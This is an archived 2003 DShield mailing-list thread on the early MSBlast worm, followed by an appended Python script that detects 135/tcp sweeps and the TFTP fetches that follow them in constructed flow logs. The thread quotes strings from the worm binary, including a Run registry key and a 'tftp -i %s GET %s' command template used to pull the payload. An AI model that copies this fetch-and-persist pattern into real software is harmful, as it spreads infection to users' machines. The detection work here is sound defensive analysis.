[Dshield] infocon: yellow

Chris Ream chrisr at stopthemcold.com
Mon Aug 11 21:01:05 GMT 2003


Has anyone captured the packet stream? I've got some sensors listening
but have not yet seen it. I would like to reconstruct it and disassemble
it to find out exactly what it's doing.

If anyone has captured it and is willing to share it I would greatly
appreciate it.

Chris Ream
Synaptek Network Security.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Andy Hopkins
Sent: Monday, August 11, 2003 2:28 PM
To: 'General DShield Discussion List'
Subject: RE: [Dshield] infocon: yellow

FYI: It's started here in NZ at 02:30 local time

------------------------------------------
Andy Hopkins
Senior Unix & Firewall Administrator
healthAlliance

(+64) (9) 486 8944
(+64) (25) 285 2139

Disclaimer:
The views and information expressed in this e-Mail are actually mine,
because my partner says so!
healthAlliance doesn't necessarily agree with me either



-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Tuesday, 12 August 2003 06:24
To: list at dshield.org
Subject: [Dshield] infocon: yellow


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
 Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
FulyEetb4Gu8+9fysZN+ajg
-----END PGP SIGNATURE-----

_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
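The behaviour Johannes reports above (a host sweeping 135/tcp, and a `tftp -i %s GET %s` string suggesting the victim then pulls the binary back over TFTP) lends itself to a simple correlation over connection logs. The script below is an added example, not code from the DShield list, the SANS ISC or any poster in the thread. The flow-log line format, the IP addresses, the one-minute window and the 20-host threshold are all constructed assumptions for the example; tune the threshold to your own baseline of legitimate RPC traffic (domain controllers and Exchange servers talk on 135/tcp all day).

```python
"""Flow-log correlation for the 135/tcp sweep + TFTP fetch pattern.

Added example (not from the DShield thread).  Two detections:
  1. a source touching many distinct hosts on 135/tcp inside a short window
  2. a TFTP (69/udp) flow from B to A shortly after A contacted B on 135/tcp,
     i.e. the freshly hit host fetching a file from whoever hit it.
Log format, addresses and thresholds are constructed for the example.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

SCAN_THRESHOLD = 20          # distinct 135/tcp destinations per window (assumption)
WINDOW = timedelta(minutes=1)  # correlation window (assumption)


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    dst: str
    proto: str
    dport: int


def parse_flow_log(text: str) -> List[Flow]:
    """Parse the constructed '<ISO time> <src> <dst> <proto> <dport>' format."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, proto, dport = line.split()
        flows.append(Flow(datetime.fromisoformat(ts), src, dst, proto.lower(), int(dport)))
    return sorted(flows, key=lambda f: f.ts)


def find_rpc_scanners(flows: List[Flow], threshold: int = SCAN_THRESHOLD,
                      window: timedelta = WINDOW) -> Dict[str, int]:
    """Sources that reached >= threshold distinct hosts on 135/tcp within one window."""
    by_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        if f.proto == "tcp" and f.dport == 135:
            by_src[f.src].append(f)
    result = {}
    for src, fs in by_src.items():
        best, start = 0, 0
        for end in range(len(fs)):          # sliding window over time-sorted flows
            while fs[end].ts - fs[start].ts > window:
                start += 1
            best = max(best, len({f.dst for f in fs[start:end + 1]}))
        if best >= threshold:
            result[src] = best
    return result


def find_tftp_after_rpc(flows: List[Flow], window: timedelta = WINDOW) -> List[Tuple[str, str]]:
    """(infecting_host, victim) pairs: A->B on 135/tcp, then B->A on 69/udp within window."""
    rpc_contacts: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for f in flows:
        if f.proto == "tcp" and f.dport == 135:
            rpc_contacts[(f.src, f.dst)].append(f.ts)
    hits = set()
    for f in flows:
        if f.proto == "udp" and f.dport == 69:
            # TFTP client (f.src) is the suspected victim; TFTP server (f.dst) hit it first
            for t in rpc_contacts.get((f.dst, f.src), []):
                if timedelta(0) <= f.ts - t <= window:
                    hits.add((f.dst, f.src))
                    break
    return sorted(hits)


def build_sample_log() -> str:
    """Constructed flow records: one sweeper, one victim fetching over TFTP, benign noise."""
    lines = []
    for i in range(25):  # 10.0.0.5 sweeps 25 hosts on 135/tcp in ~25 seconds
        lines.append(f"2003-08-11T14:20:{i:02d} 10.0.0.5 192.0.2.{i + 1} tcp 135")
    # 192.0.2.4 (hit at 14:20:03) pulls a file from the sweeper over TFTP two seconds later
    lines.append("2003-08-11T14:20:05 192.0.2.4 10.0.0.5 udp 69")
    # benign: a workstation talking to two domain controllers on 135/tcp
    lines.append("2003-08-11T14:21:00 10.0.0.7 10.0.0.1 tcp 135")
    lines.append("2003-08-11T14:21:01 10.0.0.7 10.0.0.2 tcp 135")
    # benign: TFTP with no preceding 135/tcp contact from the server side
    lines.append("2003-08-11T14:22:00 10.0.0.9 10.0.0.20 udp 69")
    return "\n".join(lines)


def analyze(text: str) -> Tuple[Dict[str, int], List[Tuple[str, str]]]:
    flows = parse_flow_log(text)
    return find_rpc_scanners(flows), find_tftp_after_rpc(flows)


if __name__ == "__main__":
    scanners, pairs = analyze(build_sample_log())
    for src, n in scanners.items():
        print(f"possible 135/tcp sweep from {src}: {n} distinct hosts within one window")
    for infector, victim in pairs:
        print(f"{victim} fetched via TFTP from {infector} right after a 135/tcp contact")
```

The second detection is the more specific one: a TFTP pull from the very host that just knocked on 135/tcp is hard to explain as normal traffic, while the sweep count alone needs a per-network threshold to avoid flagging RPC-heavy servers.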